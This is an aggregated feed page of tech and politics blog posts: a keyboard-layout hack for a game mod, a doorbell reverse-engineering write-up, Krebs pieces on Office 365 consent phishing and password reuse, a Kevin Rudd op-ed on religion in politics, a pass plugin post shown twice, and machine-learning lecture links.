Planet Russell


Worse Than FailureCodeSOD: A Key to Success

Sometimes bad code arises from incompetence, whether individual, or more usually institutional. Sometimes it's overly tight deadlines, misguided architecture. And sometimes… it's just the easiest way.

Naomi writes in to confess to some bad code.

I've recently joined the team for a mod for the obscure-outside-its-niche Freespace Open engine. Now, in some ways, the engine is pretty modern - but it is based on 20+-year-old code, so it has its share of weird quirks.

I want to make a few things clear: this is a passion project for its developers, which they offer up for free to the fans, and from which Naomi has chosen to confess one of her minor WTFs. I'm sharing Naomi's submission because, well, we all find ourselves in positions where we write bad code to accomplish our goals. Consider this more of a celebration of hacking around problems, than a traditional WTF.

Game engines, in general, have a difficult relationship with keyboard layouts. A game engine from 1999 is no exception to that. While any halfway decent engine will allow control rebindings, they're not always able to adapt to more unusual configurations. For example, as someone who types Dvorak, I'll usually switch to QWERTY before firing up a game. But some games only see QWERTY, regardless of what I've told the OS to use for its layout. Some games will latch onto whatever the keyboard layout was when I launched the game- so if I accidentally launch in Dvorak, changing to QWERTY won't take effect until I relaunch the game. Very few game engines seem to be able to handle dynamic changes to the keyboard layout.

Now, this is a problem for a small number of users. Few game engine developers care. Few players care. And most of the time, players can workaround the issues.

The Freespace engine didn't have much support for multiple keyboard layouts, but it wasn't a problem. If a player was using QWERTY, then the "Q" key could rebalance their shields, and the "A" key would accelerate their ship. The same keys would have the same behavior on an AZERTY keyboard- but their positions would be flipped. So most players would rebind- an AZERTY user would change "A" to be "shields" and "Q" to be accelerate.

And this was fine until someone added a hacking minigame to their mod. One player submitted a bug report: they couldn't pass the hacking minigame. Specifically, whatever they typed in came out wrong. And without the ability to type, they couldn't clear the mission.

Well, in this case, Naomi discovered that the user was using an AZERTY keyboard. Since the scripts controlling the hacking minigame are reading literal keypresses without applying a keyboard layout, it tries to interpret the AZERTY keystrokes as QWERTY keystrokes, zhich definitely ,qkes typing hqrd.

Naomi writes:

This might be a low priority for the engine maintainers, but it made the mod actually unplayable for some subset of users. A proper fix is coming in the next version of the engine... several months down the road, and we didn't want to wait that long. So, I authored this ridiculous hack.

-------------------------------- -- Freespace doesn't really handle different keyboard layouts very well. As a -- workaround, we've chosen a key combination - Alt-Q - that is distinct on -- QWERTY, AZERTY, and Dvorak keyboards. By listening for all three key -- combinations, we can guess which mapping the user is actually using, and -- adjust accordingly. -- This is a horrible hack and should be removed as soon as FSO supports -- these layouts properly. local keyboards = { ['Alt-Q'] = { ['A'] = 'A', ['B'] = 'B', ['C'] = 'C', ['D'] = 'D', ['E'] = 'E', ['F'] = 'F', ['G'] = 'G', ['H'] = 'H', ['I'] = 'I', ['J'] = 'J', ['K'] = 'K', ['L'] = 'L', ['M'] = 'M', ['N'] = 'N', ['O'] = 'O', ['P'] = 'P', ['Q'] = 'Q', ['R'] = 'R', ['S'] = 'S', ['T'] = 'T', ['U'] = 'U', ['V'] = 'V', ['W'] = 'W', ['X'] = 'X', ['Y'] = 'Y', ['Z'] = 'Z', ['1'] = '1', ['2'] = '2', ['3'] = '3', ['4'] = '4', ['5'] = '5', ['6'] = '6', ['7'] = '7', ['8'] = '8', ['9'] = '9', ['0'] = '0', ['Spacebar'] = ' ', ['Backspace'] = 'Backspace', ['Enter'] = 'Enter' }, ['Alt-A'] = { ['Q'] = 'A', ['B'] = 'B', ['C'] = 'C', ['D'] = 'D', ['E'] = 'E', ['F'] = 'F', ['G'] = 'G', ['H'] = 'H', ['I'] = 'I', ['J'] = 'J', ['K'] = 'K', ['L'] = 'L', [';'] = 'M', ['N'] = 'N', ['O'] = 'O', ['P'] = 'P', ['A'] = 'Q', ['R'] = 'R', ['S'] = 'S', ['T'] = 'T', ['U'] = 'U', ['V'] = 'V', ['Z'] = 'W', ['X'] = 'X', ['Y'] = 'Y', ['W'] = 'Z', ['1'] = '1', ['2'] = '2', ['3'] = '3', ['4'] = '4', ['5'] = '5', ['6'] = '6', ['7'] = '7', ['8'] = '8', ['9'] = '9', ['0'] = '0', ['Spacebar'] = ' ', ['Backspace'] = 'Backspace', ['Enter'] = 'Enter' } }

Now, I'll be honest, as annoying as this code is to write or maintain, I don't know that it's fair to call it a "horrible hack", but certainly, it should hopefully go away. The choice of keys to control which mode you're in is actually rather nice- those keys are in the same physical position, regardless of which layout you're in. On Dvorak, that could be ALT+'.

This, if you ask me, is a rather nice little solution to an ugly problem. Sure, it's a hack, but it gets the feature working, there's a plan for a longer term fix, and the stakes are really, really low. I think it's more important to actually deliver working functionality than anything else, so long as you know what mess you have to clean up in the future.

That's part of why I decided to share this snippet, because it's the kind of thing a developer might feel bad about writing, but honestly: they shouldn't. Yes, it's a hack, yes it's ugly, yes you don't want to maintain something like this any longer than you have to. But it also works, it resolves an issue for one of your users, and it allows you to focus on finding other ways to deliver value instead of agonizing over whether this is the "right" way to solve the problem.

They key to success, at the end of the day, is to write code that does something useful, or at least enjoyable.

Naomi concludes:

For the curious, there's no entry for Dvorak yet simply because I haven't found a Dvorak user to test it. And the weird mapping table existing in the first place isn't my fault. It was like that in the original script, which I didn't want to change too much for fear of introducing other, more exciting bugs.

Now, I'm not looking to add "testing a game I otherwise don't play" to my list of activities, but I hope Naomi finds another Dvorak user out there. There are dozens of us! Dozens!

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Planet DebianMatthew Garrett: More doorbell adventures

Back in my last post on this topic, I'd got shell on my doorbell but hadn't figured out why the HTTP callbacks weren't always firing. I still haven't, but I have learned some more things.

Doorbird sell a chime, a network connected device that is signalled by the doorbell when someone pushes a button. It costs about $150, which seems excessive, but would solve my problem (ie, that if someone pushes the doorbell and I'm not paying attention to my phone, I miss it entirely). But given a shell on the doorbell, how hard could it be to figure out how to mimic the behaviour of one?

Configuration for the doorbell is all stored under /mnt/flash, and there's a bunch of files prefixed 1000eyes that contain config (1000eyes is the German company that seems to be behind Doorbird). One of these was called 1000eyes.peripherals, which seemed like a good starting point. The initial contents were {"Peripherals":[]}, so it seemed likely that it was intended to be JSON. Unfortunately, since I had no access to any of the peripherals, I had no idea what the format was. I threw the main application into Ghidra and found a function that had debug statements referencing "initPeripherals and read a bunch of JSON keys out of the file, so I could simply look at the keys it referenced and write out a file based on that. I did so, and it didn't work - the app stubbornly refused to believe that there were any defined peripherals. The check that was failing was pcVar4 = strstr(local_50[0],PTR_s_"type":"_0007c980);, which made no sense, since I very definitely had a type key in there. And then I read it more closely. strstr() wasn't being asked to look for "type":, it was being asked to look for "type":". I'd left a space between the : and the opening " in the value, which meant it wasn't matching. The rest of the function seems to call an actual JSON parser, so I have no idea why it doesn't just use that for this part as well, but deleting the space and restarting the service meant it now believed I had a peripheral attached.

The mobile app that's used for configuring the doorbell now showed a device in the peripherals tab, but it had a weird corrupted name. Tapping it resulted in an error telling me that the device was unavailable, and on the doorbell itself generated a log message showing it was trying to reach a device with the hostname bha-04f0212c5cca and (unsurprisingly) failing. The hostname was being generated from the MAC address field in the peripherals file and was presumably supposed to be resolved using mDNS, but for now I just threw a static entry in /etc/hosts pointing at my Home Assistant device. That was enough to show that when I opened the app the doorbell was trying to call a CGI script called peripherals.cgi on my fake chime. When that failed, it called out to the cloud API to ask it to ask the chime[1] instead. Since the cloud was completely unaware of my fake device, this didn't work either. I hacked together a simple server using Python's HTTPServer and was able to return data (another block of JSON). This got me to the point where the app would now let me get to the chime config, but would then immediately exit. adb logcat showed a traceback in the app caused by a failed assertion due to a missing key in the JSON, so I ran the app through jadx, found the assertion and from there figured out what keys I needed. Once that was done, the app opened the config page just fine.

Unfortunately, though, I couldn't edit the config. Whenever I hit "save" the app would tell me that the peripheral wasn't responding. This was strange, since the doorbell wasn't even trying to hit my fake chime. It turned out that the app was making a CGI call to the doorbell, and the thread handling that call was segfaulting just after reading the peripheral config file. This suggested that the format of my JSON was probably wrong and that the doorbell was not handling that gracefully, but trying to figure out what the format should actually be didn't seem easy and none of my attempts improved things.

So, new approach. Rather than writing the config myself, why not let the doorbell do it? I should be able to use the genuine pairing process if I could mimic the chime sufficiently well. Hitting the "add" button in the app asked me for the username and password for the chime, so I typed in something random in the expected format (six characters followed by four zeroes) and a sufficiently long password and hit ok. A few seconds later it told me it couldn't find the device, which wasn't unexpected. What was a little more unexpected was that the log on the doorbell was showing it trying to hit another bha-prefixed hostname (and, obviously, failing). The hostname contains the MAC address, but I hadn't told the doorbell the MAC address of the chime, just its username. Some more digging showed that the doorbell was calling out to the cloud API, giving it the 6 character prefix from the username and getting a MAC address back. Doing the same myself revealed that there was a straightforward mapping from the prefix to the mac address - changing the final character from "a" to "b" incremented the MAC by one. It's actually just a base 26 encoding of the MAC, with aaaaaa translating to 00408C000000.

That explained how the hostname was being generated, and in return I was able to work backwards to figure out which username I should use to generate the hostname I was already using. Attempting to add it now resulted in the doorbell making another CGI call to my fake chime in order to query its feature set, and by mocking that up as well I was able to send back a file containing X-Intercom-Type, X-Intercom-TypeId and X-Intercom-Class fields that made the doorbell happy. I now had a valid JSON file, which cleared up a couple of mysteries. The corrupt name was because the name field isn't supposed to be ASCII - it's base64 encoded UTF16-BE. And the reason I hadn't been able to figure out the JSON format correctly was because it looked something like this:


Note that there's a total of one [ in this file, but two ]s? Awesome. Anyway, I could now modify the config in the app and hit save, and the doorbell would then call out to my fake chime to push config to it. Weirdly, the association between the chime and a specific button on the doorbell is only stored on the chime, not on the doorbell. Further, hitting the doorbell didn't result in any more HTTP traffic to my fake chime. However, it did result in some broadcast UDP traffic being generated. Searching for the port number led me to the Doorbird LAN API and a complete description of the format and encryption mechanism in use. Argon2I is used to turn the first five characters of the chime's password (which is also stored on the doorbell itself) into a 256-bit key, and this is used with ChaCha20 to decrypt the payload. The payload then contains a six character field describing the device sending the event, and then another field describing the event itself. Some more scrappy Python and I could pick up these packets and decrypt them, which showed that they were being sent whenever any event occurred on the doorbell. This explained why there was no storage of the button/chime association on the doorbell itself - the doorbell sends packets for all events, and the chime is responsible for deciding whether to act on them or not.

On closer examination, it turns out that these packets aren't just sent if there's a configured chime. One is sent for each configured user, avoiding the need for a cloud round trip if your phone is on the same network as the doorbell at the time. There was literally no need for me to mimic the chime at all, suitable events were already being sent.

Still. There's a fair amount of WTFery here, ranging from the strstr() based JSON parsing, the invalid JSON, the symmetric encryption that uses device passwords as the key (requiring the doorbell to be aware of the chime's password) and the use of only the first five characters of the password as input to the KDF. It doesn't give me a great deal of confidence in the rest of the device's security, so I'm going to keep playing.

[1] This seems to be to handle the case where the chime isn't on the same network as the doorbell

comment count unavailable comments


Cryptogram The Story of Colossus

Nice video of a talk by Chris Shore on the history of Colossus.

Cryptogram New Spectre-Like Attacks

There’s new research that demonstrates security vulnerabilities in all of the AMD and Intel chips with micro-op caches, including the ones that were specifically engineered to be resistant to the Spectre/Meltdown attacks of three years ago.


The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a writeup from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction.

It seems really difficult to exploit these vulnerabilities. We’ll need some more analysis before we understand what we have to patch and how.

More news.

Rondam RamblingsRepublican Hypocrisy Watch: Cancel Culture is Bad -- Unless it's Republicans Doing the Cancelling

The brazen shamelessness of Republican hypocrisy is on full display as they move to remove Liz Cheney from her leadership position for daring to say that Donald Trump lost the election while at the same time whining about cancel culture.I am really beginning to wonder if there is anyone left in the Republican party who realizes that you can only act like the old Soviet politburo for so long

Krebs on SecurityMalicious Office 365 Apps Are the Ultimate Insiders

Phishers targeting Microsoft Office 365 users increasingly are turning to specialized links that take users to their organization’s own email login page. After a user logs in, the link prompts them to install a malicious but innocuously-named app that gives the attacker persistent, password-free access to any of the user’s emails and files, both of which are then plundered to launch malware and phishing scams against others.

These attacks begin with an emailed link that when clicked loads not a phishing site but the user’s actual Office 365 login page — whether that be at or their employer’s domain. After logging in, the user might see a prompt that looks something like this:

These malicious apps allow attackers to bypass multi-factor authentication, because they are approved by the user after that user has already logged in. Also, the apps will persist in a user’s Office 365 account indefinitely until removed, and will survive even after an account password reset.

This week, messaging security vendor Proofpoint published some new data on the rise of these malicious Office 365 apps, noting that a high percentage of Office users will fall for this scheme [full disclosure: Proofpoint is an advertiser on this website].

Ryan Kalember, Proofpoint’s executive vice president of cybersecurity strategy, said 55 percent of the company’s customers have faced these malicious app attacks at one point or another.

“Of those who got attacked, about 22 percent — or one in five — were successfully compromised,” Kalember said.

Kalember said Microsoft last year sought to limit the spread of these malicious Office apps by creating an app publisher verification system, which requires the publisher to be a valid Microsoft Partner Network member.

That approval process is cumbersome for attackers, so they’ve devised a simple work around. “Now, they’re compromising accounts in credible tenants first,” Proofpoint explains. “Then, they’re creating, hosting and spreading cloud malware from within.”

The attackers responsible for deploying these malicious Office apps aren’t after passwords, and in this scenario they can’t even see them. Rather, they’re hoping that after logging in users will click yes to a approve the installation of a malicious but innocuously-named app into their Office365 account.

Kalember said the crooks behind these malicious apps typically use any compromised email accounts to conduct “business email compromise” or BEC fraud, which involves spoofing an email from someone in authority at an organization and requesting the payment of a fictitious invoice. Other uses have included the sending of malware-laced emails from the victim’s email account.

Last year, Proofpoint wrote about a service in the cybercriminal underground where customers could access various Office 365 accounts without a username or password. The service also advertised the ability to extract and filter emails and files based on selected keywords, as well as attach malicious macros to all documents in a user’s Microsoft OneDrive.

A cybercriminal service advertising the sale of access to hacked Office365 accounts. Image: Proofpoint.

“You don’t need a botnet if you have Office 365, and you don’t need malware if you have these [malicious] apps,” Kalember said. “It’s just easier, and it’s a good way to bypass multi-factor authentication.”

KrebsOnSecurity first warned about this trend in January 2020. That story cited Microsoft saying that while organizations running Office 365 could enable a setting to restrict users from installing apps, doing so was a “drastic step” that “severely impairs your users’ ability to be productive with third-party applications.”

Since then, Microsoft added a policy that allows Office 365 administrators to block users from consenting to an application from a non-verified publisher. Also, applications published after November 8, 2020, are coupled with a consent screen warning in case the publisher is not verified, and the tenant policy allows the consent.

Microsoft’s instructions for detecting and removing illicit consent grants in Office 365 are here.

Proofpoint says O365 administrators should limit or block which non-administrators can create applications, and enable Microsoft’s verified publisher policy — as a majority of cloud malware is still coming from Office 365 tenants that are not part of Microsoft’s partner network. Experts say it’s also important to ensure you have security logging turned on so that alerts are generated when employees are introducing new software into your infrastructure.

Kevin RuddThe Guardian: Scott Morrison’s partisan interpretation of biblical passages is disturbing for democracy

When the federation’s founding fathers were framing Australia’s constitution in the 1890s, there was intense debate about whether organised religion should get a guernsey. Fortunately, despite the religiosity of the Victorian era, sounder heads prevailed. Unlike in the United Kingdom, our antipodean commonwealth would have no established religion.

Admittedly, “Almighty God” makes a single appearance in the constitution’s preamble, but the founders consciously decided to give divinity no institutional role. Instead, they resolved that our commonwealth should be secular, governed by a secular executive and accountable to a secular parliament.

The founders knew too well how much blood had been previously spilled at the intersection of religious fervour and the political powers of the state.

This isn’t to discount the profound effect of Christianity on our nation’s history. The churches were largely responsible for our earliest efforts to provide education, health and welfare services for the poor. It took decades for the state to assume primary responsibility for what are now regarded as essential functions of government.

Equally, Christians of various denominations have been elected to parliament over the past 120 years. But whether MPs were Christian, Jewish, Muslim, atheist or agnostic, they have conducted the substantive business of parliament in secular terms.

Irrespective of whether members’ positions have been influenced by theology, philosophy or pure political pragmatism, the terms of debate have been anchored in rational argument, empirical evidence and party philosophy. In other words, in the great contest of ideas, proposals are forced to stand on their merit, rather than relying on the self-evident “truths” of divine relation. By and large, our secular political system has worked. Our democracy has been stable, and our parliament preserved from the theocratic impulses of our more extreme religious denominations.

Whenever concerns are raised about Scott Morrison’s Pentecostal belief, it has become customary to point the finger at my own religious practice as a Labor prime minister of Christian faith. The argument goes: why should Morrison be held to any particular scrutiny since Rudd and his family regularly attended their local Anglican church, calling press conferences in the churchyard?

Like many things in political life, this has become an accepted meme of the Liberal National party and the Murdoch media. The only problem is, it isn’t true.

Yes, throughout our adult lives, Therese and I have professed Christian faith. She was raised Anglican, myself a Roman Catholic, so we started attending one church together as a family. In Brisbane, we attended St John’s in Bulimba, and in Canberra, St John’s in Reid, for more than 30 years.

When I entered politics, journalists would occasionally arrive without invitation to pepper me with questions about the news of the day, either before or after services. It was a convenient stakeout for them. Despite my wishing that they wouldn’t gather there, I learned to stop and answer a few questions outside the church gate to avoid a media circus.

I have never believed that God was “on my side” in any election campaign – a position, which if held by any prime minister, would be borderline theocracy – nor have I ever believed that God could speak to me or send me revelations about what to do as a politician.

My simple, garden-variety theology is this: the God of the New Testament gives preference to the poor, the outcast and the oppressed and, to the greatest extent possible, I should do the same, while also being a good custodian of the planet.

From what we can discern from the public record, Morrison’s political theology is radically different.

His tradition, Pentecostalism, often emphasises the highly individualised “health and wealth gospel” – that if you are godly, then you will be both healthy and wealthy. Questions of human sexuality tend to elicit a deeply conservative, fundamentalist answer. The Pentecostal tradition also includes communicating with God through “speaking in tongues” and the ability to discern God’s will by being attentive to those with the prophetic “word of knowledge”. In other words, some Pentecostal leaders believe they can communicate directly with God in the here and now, and then proceed to act as God wishes them to. These Pentecostal tenets can present problems for our secular democracy, as elucidated by Morrison’s speech to a Pentecostal conference on the Gold Coast last week.

First, Morrison made extensive reference to kings and prophets from the Old Testament. Morrison’s exegesis was highly individualistic. In the case of Isaiah, Morrison’s speech implies that, during the last federal election, God spoke to him through a painting of an eagle (which Morrison interpreted as him being elevated by the divine in his earthly contest against the Labor party).

Such a politically partisan interpretation of biblical passages is disturbing for our secular democracy. More fundamentally, it is worrying if the prime minister believes God somehow speaks directly to him.

Second, there is a troubling section of Morrison’s speech where he indicates that humans aren’t capable of fixing problems on Earth. Instead, he says, that’s the responsibility of God; and what the country needs, therefore, is the growth of the church.

The problem with this approach is that it effectively consigns responsibility for poverty and the despoliation of the planet to powers beyond our control, as we drift to a utopian afterlife. This sort of “millennialism” has been a problem in the church for the past 2,000 years as it diminishes the role of human agency in “fixing” demonstrable social and economic injustices. The logical conclusion is that our best tool to deal with such challenges is prayer, and that’s just a cop-out.

Third, the very idea that a prime minister could happily go around “laying on hands” on unsuspecting civilians to impart the healing power of prayer is troubling. The critical thing lacking is the person’s knowledge and consent. This doesn’t seem to bother Morrison, who apparently believes he’s not only the chief minister of the commonwealth but also its chief priest. This is a fundamental breach of the secularity of our political institutions.

Fourth, the problem with Morrison’s overall theology – his preoccupation with the kings and prophets of the Old Testament, his diminution of human as opposed to divine agency, and his exercise of priestly functions without permission – is that it undermines the role of reason, evidence and fact in faith.

The mainstream church, since the days of St Thomas Aquinas in the 13th century, has considered that faith should be tempered by reason. In the long history of the church, fundamentalist traditions have railed against reason and empiricism, instead emphasising absolute faith as the hallmark of an authentic Christian.

By and large, Pentecostalism emerges from this tradition. It is a worldview that sits uncomfortably with the extraordinary powers of the secular office of prime minister.

Pentecostal churches have long attracted good, honest, Australians from across the political spectrum – but the reality is the Liberal National party is now deliberately targeting these churches as recruiting grounds. In my own state of Queensland, the Christian right faction within the LNP is substantially Pentecostal. These recruitment drives are pushing that party further and further to the political hard right. Secular rationalists are now becoming an endangered species within many branches of the conservative parties, contributing to the growing polarisation of our politics, as in America.

It may be that Morrison has solid answers to my reservations. Before becoming prime minister in 2007, I wrote a lengthy essay for the Monthly magazine that outlined my own positions on the role that Christian belief should play within our secular democracy. It is high time for Morrison to do the same, not least to allay the doubts of Australians who have been deeply disturbed by the grainy footage of his extraordinary remarks last week.

I have no doubt that Morrison’s faith is genuine. For some years, we attended the same parliamentary Christian fellowship. My question is not about his sincerity of faith, but the need for him to be absolutely transparent with the Australian people, through the secular marketplace of our national politics, about the precise impact of his Pentecostal theology on Australian public policy and politics.

First published in The Guardian


The post The Guardian: Scott Morrison’s partisan interpretation of biblical passages is disturbing for democracy appeared first on Kevin Rudd.

Worse Than FailureCodeSOD: Touch of Death

Unit testing in C offers its own special challenges. Unit testing an application heavily dependent upon threads, written in C, offers even more.

Brian inherited an application where the main loop of the actual application looked something like:

int main(int argc, char **argv) { msg_t *msg; if (!init()) exit(EXIT_FAILURE); for ( ; ; ) { msg = get_msg(); if (msg == NULL) continue; process_msg(msg); } }

Read an input message, handle the message, read the next message, in an endless loop. Now, that's a perfectly reasonable main method for a message-oriented service, but certainly you wouldn't want to unit test that way.

Brian writes:

As it turns out, this particular test application is just a clone of application which it is supposed to test, but it's linked with a "brillant" test framework rather than the normal application framework.

The test application would read test messages from an input file, which allowed it to simulate receiving messages. It would then pass those messages off to the code being tested. It's the way it decided testing was over where the problems showed up:

msg_t *get_msg() { struct stat fileInfo; char rec[1024]; /* touch stoptesting to shutdown this application */ if (stat("stoptesting", &fileInfo) != -1) { printf("Done testing..."); system("rm stoptesting"); if (shutdownFn) shutdownFn(); exit(EXIT_SUCCESS); } if (fgets(rec, sizeof(rec), inFile) == NULL || feof(inFile)) { return NULL; } return fileRecordToMsg(rec); }

The test application stats a file called stoptesting. If the file exists, the program exits. It uses system("rm stoptesting") to call out to the shell to remove the file (ignoring the perfectly good unlink syscall). The absolute only indication that this is how you stop the application is that comment in the middle of the method.

If, like Brian, you didn't read through every single line of code before running the test application, you'd find yourself staring at a program that refuses to exit, but also isn't using any meaningful quantities of CPU, which makes you assume something is wrong with your test program.

Which yes, there is something wrong with the test program. More than one thing, actually. Sure, the "touch a file to exit" is wrong, but as Brian points out, so is the name of the file:

The real WTF? They should have named the file "ofdeath" so at least shutting it down would be fun:

$ touch ofdeath

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Planet DebianJunichi Uekawa: Wrote a pomodoro timer in elisp.

Wrote a pomodoro timer in elisp. Why? Because I try to keep my workflow simple, and to keep the simplicity I sometimes need to re-implement stuff. No this is a lame excuse. I have been living in emacs for the past week and felt like it. However writing elisp has been challenging, maybe because I haven't done it for a while. I noticed there's lexical-binding, but I didn't quite get it, my lambda isn't getting the function parameter in scope.


Krebs on SecurityThe Wages of Password Re-use: Your Money or Your Life

When normal computer users fall into the nasty habit of recycling passwords, the result is most often some type of financial loss. When cybercriminals develop the same habit, it can eventually cost them their freedom.

Our passwords can say a lot about us, and much of what they have to say is unflattering. In a world in which all databases — including hacker forums — are eventually compromised and leaked online, it can be tough for cybercriminals to maintain their anonymity if they’re in the habit of re-using the same unusual passwords across multiple accounts associated with different email addresses.

The long-running Breadcrumbs series here tracks how cybercriminals get caught, and it’s mostly through odd connections between their online and offline selves scattered across the Internet. Interestingly, one of the more common connections involves re-using or recycling passwords across multiple accounts.

And yes, hackers get their passwords compromised at the same rate as the rest of us. Which means when a cybercrime forum gets hacked and its user databases posted online, it is often possible to work backwards from some of the more unique passwords for each account and see where else that password was used.


Of all the stories I’ve written here over the last 11 years, probably the piece I get asked most to recount is the one about Sergey “Fly” Vovnenko, a Ukrainian man who in 2013 hatched and executed a plan to buy heroin off the dark web, ship it to our house and then spoof a call to the police from one of our neighbors saying we were dealing drugs.

Fly was the administrator of a Russian-language identity theft forum at the time, and as a secret lurker on his forum KrebsOnSecurity watched his plan unfold in real time. As I described in a 2019 story about an interview Fly gave to a Russian publication upon his release from a U.S. prison, his propensity for password re-use ultimately landed him in Italy’s worst prison for more than a year before he was extradited to face charges in America.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two was the password for his email account was the same as his cybercrime forum admin account. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.


While it may sound unlikely that a guy so enmeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

Countless times over the years I’ve encountered huge tranches of valuable, dangerous data — like a botnet control panel or admin credentials for cybercrime forums — that were full of bad passwords, like password1 or 123qweasd (an incredibly common keyboard pattern password).

I suspect this may be because the nature of illicit activity online requires cybercrooks to create vast numbers of single- or brief-use accounts, and as such they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

Regardless of their reasons or lack thereof for choosing poor passwords, it is fascinating that in terms of maintaining one’s operational security it actually benefits cybercriminals to use poor passwords in many situations.

For example, it is often the denizens of the cybercrime underground who pick crappy passwords for their forum accounts who end up doing their future selves a favor when the forum eventually gets hacked and its user database is posted online.


It really stinks that it’s mid-2021 and we’re still so reliant on passwords. But as long as that’s the case, I hope it’s clear that the smartest choice for all Internet users is to pick unique passwords for every site. The major Web browsers will now auto-suggest long, complex and unique passwords when users go to set up a new account somewhere online, and this is obviously the simplest way to achieve that goal.

Password managers are ideal for people who can’t break the habit of re-using passwords, because you only have to remember one (strong) master password to access all of your stored credentials.

If you don’t trust password managers and have trouble remembering complex passwords, consider relying instead on password length, which is a far more important determiner of whether a given password can be cracked by available tools in any timeframe that might be reasonably useful to an attacker.

In that vein, it’s safer and wiser to focus on picking passphrases instead of passwords. Passphrases are collections of multiple (ideally unrelated) words mushed together. Passphrases are not only generally more secure, they also have the added benefit of being easier to remember. Their main limitation is that countless sites still force you to add special characters and place arbitrary limits on password length possibilities.

Finally, there’s absolutely nothing wrong with writing down your passwords, provided a) you do not store them in a file on your computer or taped to your laptop, and b) that your password notebook is stored somewhere relatively secure, i.e. not in your purse or car, but something like a locked drawer or safe.

Further reading: Who’s Behind the GandCrab Ransomware?

Planet DebianSteve Kemp: Password store plugin: env

Like many I use pass for storing usernames and passwords. This gives me easy access to credentials in a secure manner.

I don't like the way that the metadata (i.e. filenames) are public, but that aside it is a robust tool I've been using for several years.

The last time I talked about pass was when I talked about showing the age of my credentials, via the integrated git support.

That then became a pass-plugin:

  frodo ~ $ pass age
  6 years ago GPG/root@localhost.gpg
  6 years ago GPG/
  4 years, 8 months ago Domains/
  4 years, 7 months ago Mobile/
  1 year, 3 months ago Websites/
  1 year ago Financial/
  1 year ago Mobile/KiK.gpg
  4 days ago Enfuce/sre.tst.gpg

Anyway today's work involved writing another plugin, named env. I store my data in pass in a consistent form, each entry looks like this:

   username: steve
   password: secrit
   # Extra data

The keys vary, sometimes I use "login", sometimes "username", other times "email", but I always label the fields in some way.

Recently I was working with some CLI tooling that wants to have a username/password specified and I patched it to read from the environment instead. Now I can run this:

     $ pass env internal/cli/tool-name
     export username="steve"
     export password="secrit"

That's ideal, because now I can source that from within a shell:

   $ source <(pass env internal/cli/tool-name)
   $ echo username

Or I could directly execute the tool I want:

   $ pass env --exec=$HOME/ldap/ internal/cli/tool-name
   you are steve

TLDR: If you store your password entries in "key: value" form you can process them to export $KEY=$value, and that allows them to be used without copying and pasting into command-line arguments (e.g. "~/ldap/ --username=steve --password=secrit")

Planet DebianSteve Kemp: Password store plugin: enve

Like many I use pass for storing usernames and passwords. This gives me easy access to credentials in a secure manner.

I don't like the way that the metadata (i.e. filenames) are public, but that aside it is a robust tool I've been using for several years.

The last time I talked about pass was when I talked about showing the age of my credentials, via the integrated git support.

That then became a pass-plugin:

  frodo ~ $ pass age
  6 years ago GPG/root@localhost.gpg
  6 years ago GPG/
  4 years, 8 months ago Domains/
  4 years, 7 months ago Mobile/
  1 year, 3 months ago Websites/
  1 year ago Financial/
  1 year ago Mobile/KiK.gpg
  4 days ago Enfuce/sre.tst.gpg

Anyway today's work involved writing another plugin, named env. I store my data in pass in a consistent form, each entry looks like this:

   username: steve
   password: secrit
   # Extra data

The keys vary, sometimes I use "login", sometimes "username", other times "email", but I always label the fields in some way.

Recently I was working with some CLI tooling that wants to have a username/password specified and I patched it to read from the environment instead. Now I can run this:

     $ pass env internal/cli/tool-name
     export username="steve"
     export password="secrit"

That's ideal, because now I can source that from within a shell:

   $ source <(pass env internal/cli/tool-name)
   $ echo username

Or I could directly execute the tool I want:

   $ pass env --exec=$HOME/ldap/ internal/cli/tool-name
   you are steve

TLDR: If you store your password entries in "key: value" form you can process them to export $KEY=$value, and that allows them to be used without copying and pasting into command-line arguments (e.g. "~/ldap/ --username=steve --password=secrit")

Cryptogram Tesla Remotely Hacked from a Drone

This is an impressive hack:

Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi. It would be possible for an attacker to unlock the doors and trunk, change seat positions, both steering and acceleration modes — in short, pretty much what a driver pressing various buttons on the console can do. This attack does not yield drive control of the car though.

That last sentence is important.

News article.

Planet DebianErich Schubert: Machine Learning Lecture Recordings

I have uploaded most of my “Machine Learning” lecture to YouTube.

The slides are in English, but the audio is in German.

Some very basic contents (e.g., a demo of standard k-means clustering) were left out from this advanced class, and instead only a link to recordings from an earlier class were given. In this class, I wanted to focus on the improved (accelerated) algorithms instead. These are not included here (yet). I believe there are some contents covered in this class you will find nowhere else (yet).

The first unit is pretty long (I did not split it further yet). The later units are shorter recordings.

ML F1: Principles in Machine Learning

ML F2/F3: Correlation does not Imply Causation & Multiple Testing Problem

ML F4: Overfitting – Überanpassung

ML F5: Fluch der Dimensionalität – Curse of Dimensionality

ML F6: Intrinsische Dimensionalität – Intrinsic Dimensionality

ML F7: Distanzfunktionen und Ähnlichkeitsfunktionen

ML L1: Einführung in die Klassifikation

ML L2: Evaluation und Wahl von Klassifikatoren

ML L3: Bayes-Klassifikatoren

ML L4: Nächste-Nachbarn Klassifikation

ML L5: Nächste Nachbarn und Kerndichteschätzung

ML L6: Lernen von Entscheidungsbäumen

ML L7: Splitkriterien bei Entscheidungsbäumen

